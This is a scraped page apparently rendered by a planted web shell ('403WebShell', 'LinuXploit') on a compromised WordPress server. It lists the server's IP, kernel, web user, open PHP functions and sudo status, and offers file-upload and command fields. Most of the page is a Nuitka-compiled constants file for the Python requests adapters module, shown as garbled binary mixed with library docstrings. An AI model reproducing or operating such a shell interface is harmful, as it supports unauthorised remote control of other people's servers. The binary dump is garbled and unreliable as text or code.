Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /nuitka/eggshell.build/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /nuitka/eggshell.build/module.requests.adapters.const
���
InvalidSchema�.��-�'Missing dependencies for SOCKS support.���.���BaseAdapter�.���__init__�.��JXCSends PreparedRequest object. Returns Response object.

        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param stream: (optional) Whether to stream the request content.
        :param timeout: (optional) How long to wait for the server to send
            data before giving up, as a float, or a :ref:`(connect timeout,
            read timeout) <timeouts>` tuple.
        :type timeout: float or tuple
        :param verify: (optional) Either a boolean, in which case it controls whether we verify
            the server's TLS certificate, or a string, in which case it must be a path
            to a CA bundle to use
        :param cert: (optional) Any user-provided SSL certificate to be trusted.
        :param proxies: (optional) The proxies dictionary to apply to the request.
        �.��%�!Cleans up adapter specific items.�.���DEFAULT_RETRIES�.��	�Retry�.��K���.��
�read���.���max_retries�.���from_int�.��
�config�.���
proxy_manager�.���HTTPAdapter�.���_pool_connections�.���
_pool_maxsize�.���_pool_block�.���init_poolmanager�.���block���.��
�	__attrs__�.��	�items�.��*�&too many values to unpack (expected 2)�.���PoolManager�.��
�	num_pools�.���maxsize�.�h.��
�strict�.���poolmanager�.��XInitializes a urllib3 PoolManager.

        This method should not be called from user code, and is only
        exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param connections: The number of urllib3 connection pools to cache.
        :param maxsize: The maximum number of connections to save in the pool.
        :param block: Block when no free connections are available.
        :param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
        �.��	�lower�.���
startswith�.���socks���.���get_auth_from_url�.���SOCKSProxyManager�.���username�.���password�.���
proxy_headers�.���proxy_from_url�.���X�Return urllib3 ProxyManager for the given proxy.

        This method should not be called from user code, and is only
        exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param proxy: The proxy to return a urllib3 ProxyManager for.
        :param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
        :returns: ProxyManager
        :rtype: urllib3.ProxyManager
        �.���https���.���extract_zipped_paths�.���DEFAULT_CA_BUNDLE_PATH�.���os�.���path�.��
�exists�.��I�ECould not find a suitable TLS CA certificate bundle, invalid path: {}�.���cert_loc�.���
CERT_REQUIRED�.��
�	cert_reqs�.��	�isdir�.���ca_certs�.���ca_cert_dir�.��
�	CERT_NONE�.���
basestring�.�K.��
�	cert_file�.�K.���key_file�.��=�9Could not find the TLS certificate file, invalid path: {}�.��5�1Could not find the TLS key file, invalid path: {}�.��HXAVerify a SSL certificate. This method should not be called from user
        code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param conn: The urllib3 connection object associated with the cert.
        :param url: The requested URL.
        :param verify: Either a boolean, in which case it controls whether we verify
            the server's TLS certificate, or a string, in which case it must be a path
            to a CA bundle to use
        :param cert: The SSL certificate to verify.
        �.���Response�.��
�status�.���status_code�.���CaseInsensitiveDict�.���headers�.���get_encoding_from_headers�.���encoding�.���raw�.��
�reason�.���url�.��
�decode�.���utf-8���.���extract_cookies_to_jar�.���cookies�.���request�.���
connection�.���X�Builds a :class:`Response <requests.Response>` object from a urllib3
        response. This should not be called from user code, and is only exposed
        for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`

        :param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
        :param resp: The urllib3 response object.
        :rtype: requests.Response
        �.���select_proxy�.���prepend_scheme_if_needed�.���http�.��
�	parse_url�.���host�.���InvalidProxyURL�.��L�FPlease check proxy URL. It is malformed and could be missing the host.���.���proxy_manager_for�.���connection_from_url�.���urlparse�.��
�geturl�.���X�Returns a urllib3 connection for the given URL. This should not be
        called from user code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param url: The URL to connect to.
        :param proxies: (optional) A Requests-style dictionary of proxies used on this request.
        :rtype: urllib3.ConnectionPool
        �.��	�clear�.��
�values�.�����Disposes of any internal state.

        Currently, this closes the PoolManager and any active ProxyManager,
        which closes any pooled connections.
        �.��
�scheme�.��	�https�.���path_url�.���
urldefragauth�.��FX?Obtain the url to use when making the final request.

        If the message is being sent through a HTTP proxy, the full URL has to
        be used. Otherwise, we should only use the path portion of the URL.

        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs.
        :rtype: str
        �.���_basic_auth_str�.���Proxy-Authorization�.��XReturns a dictionary of the headers to add to any request sent
        through a proxy. This works with urllib3 magic to ensure that they are
        correctly sent to the proxy, rather than in a tunnelled request if
        CONNECT is being used.

        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param proxy: The url of the proxy being used for this request.
        :rtype: dict
        �.���get_connection�.���LocationValueError�.���
InvalidURL�.��hO��.���cert_verify�.���request_url�.���add_headers�.��1(�stream��timeout��verify��cert��proxies�t�.���body�.���Content-Length�.���TimeoutSauce�.���connect�h
��.��v�rInvalid timeout {}. Pass a (connect, read) timeout tuple, or a single float to set both timeouts to the same value�.���urlopen�.��
�method�.�hr.��a(h~hIhw�headers��redirect��assert_same_host��preload_content��decode_content��retries�hrt�.���
proxy_pool�.���conn�.��
�	_get_conn�.���DEFAULT_POOL_TIMEOUT�.��hr��.���
putrequest�.��}��skip_accept_encoding��s.���low_conn�.��
�	putheader�.���
endheaders�.���send�.���builtins��slice���KNN��R�.��
�encode�.��C
���.��C0

���.���getresponse�.�����.���	buffering���.���HTTPResponse�.���from_httplib�.��(�pool�hPh�h�t�.��	�close�.���
ProtocolError�.��
�socket�.��	�error�.���ConnectionError�.���
MaxRetryError�.���ConnectTimeoutError�.���NewConnectionError�.���ConnectTimeout�.���
ResponseError�.���
RetryError�.���_ProxyError�.���
ProxyError�.��
�	_SSLError�.���SSLError�.���ClosedPoolError�.���
_HTTPError�.���ReadTimeoutError�.���ReadTimeout�.���build_response�.���XSends PreparedRequest object. Returns Response object.

        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param stream: (optional) Whether to stream the request content.
        :param timeout: (optional) How long to wait for the server to send
            data before giving up, as a float, or a :ref:`(connect timeout,
            read timeout) <timeouts>` tuple.
        :type timeout: float or tuple or urllib3 Timeout object
        :param verify: (optional) Either a boolean, in which case it controls whether
            we verify the server's TLS certificate, or a string, in which case it
            must be a path to a CA bundle to use
        :param cert: (optional) Any user-provided SSL certificate to be trusted.
        :param proxies: (optional) The proxies dictionary to apply to the request.
        :rtype: requests.Response
        �.�����
requests.adapters
~~~~~~~~~~~~~~~~~

This module contains the transport adapters that Requests uses to define
and maintain connections.
�.���__doc__�.��7�3/usr/lib/python3/dist-packages/requests/adapters.py�.���__file__�.���__spec__�.��
�origin�.���has_location�.���
__cached__�.���os.path�.���urllib3.poolmanager�.��hh)��.���urllib3.response�.��h���.���urllib3.util�.��hU��.��
�Timeout���.�h�.���urllib3.util.retry�.��h��.���urllib3.exceptions�.��h���.��h���.���	HTTPError���.�h�.��h���.��h���.��h���.��h���.��h���.��h���.��h���.��hk��.��
�models�.��h@��.��
�compat�.��h\h:��.��	�utils�.��(h.h-hEhSh$hehRt�.���
structures�.��hC��.��hM��.���
exceptions�.��(h�h�h�h�h�h�hhWhlt�.���auth�.��hg��.���urllib3.contrib.socks�.��h%��.���DEFAULT_POOLBLOCK�.�K
.���DEFAULT_POOLSIZE�.��h��object�����.��
�	metaclass�.���__prepare__�.���__getitem__�.��2�.%s.__prepare__() must return a mapping, not %s�.���__name__�.���<metaclass>�.���requests.adapters�.���
__module__�.���The Base Transport Adapter�.���__qualname__�.���BaseAdapter.__init__�.��	(�N�NNt�.���BaseAdapter.send�.���BaseAdapter.close�.���__orig_bases__�.���X�The built-in HTTP Adapter for urllib3.

    Provides a general-case interface for Requests sessions to contact HTTP and
    HTTPS urls by implementing the Transport Adapter interface. This class will
    usually be created by the :class:`Session <Session>` class under the
    covers.

    :param pool_connections: The number of urllib3 connection pools to cache.
    :param pool_maxsize: The maximum number of connections to save in the pool.
    :param max_retries: The maximum number of retries each connection
        should attempt. Note, this applies only to failed DNS lookups, socket
        connections and connection timeouts, never to requests where data has
        made it to the server. By default, Requests does not retry failed
        connections. If you need granular control over the conditions under
        which we retry a request, import urllib3's ``Retry`` class and pass
        that instead.
    :param pool_block: Whether the connection pool should block for connections.

    Usage::

      >>> import requests
      >>> s = requests.Session()
      >>> a = requests.adapters.HTTPAdapter(max_retries=3)
      >>> s.mount('http://', a)
    �.��N]�(�max_retries��config��_pool_connections��
_pool_maxsize��_pool_block�e.���HTTPAdapter.__init__�.���__getstate__�.���HTTPAdapter.__getstate__�.���__setstate__�.���HTTPAdapter.__setstate__�.�� �HTTPAdapter.init_poolmanager�.��!�HTTPAdapter.proxy_manager_for�.���HTTPAdapter.cert_verify�.���HTTPAdapter.build_response�.��N��.���HTTPAdapter.get_connection�.���HTTPAdapter.close�.���HTTPAdapter.request_url�.��)X"Add any headers needed by the connection. As of v2.0 this does
        nothing by default, but is left for overriding by users that subclass
        the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.

        :param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
        :param kwargs: The keyword arguments from the call to send().
        �.���HTTPAdapter.add_headers�.���HTTPAdapter.proxy_headers�.���HTTPAdapter.send�.���<dictcontraction>�.���attr��self���.���<module requests.adapters>�.���	__class__���.���args��kwargs���.��j��.��
jj��.��?(j�pool_connections��pool_maxsize�h�
pool_block�jt�.��(j�state�j�value�t�.��jhOj��.��!(j�req��resp��response�t�.��(jh�hIhshth3t�.��j�proxy���.��+(jhIhuj-�	proxy_url�hh��parsed�t�.��)(j�connections�hh�pool_kwargs�t�.��(jj-hh&h't�.��-(jj-�proxy_kwargs��manager�h&h'h(t�.��S(jhOhuj-hb�is_proxied_http_request��using_socks_proxy��proxy_scheme�hIt�.��(jhOhqhrhshthut�.��N(jhOhqhrhshthuh��e�hI�chunked�hzh
�err�j)h��header�j%�i��r�t�.����.

Youez - 2016 - github.com/yon3zu
LinuXploit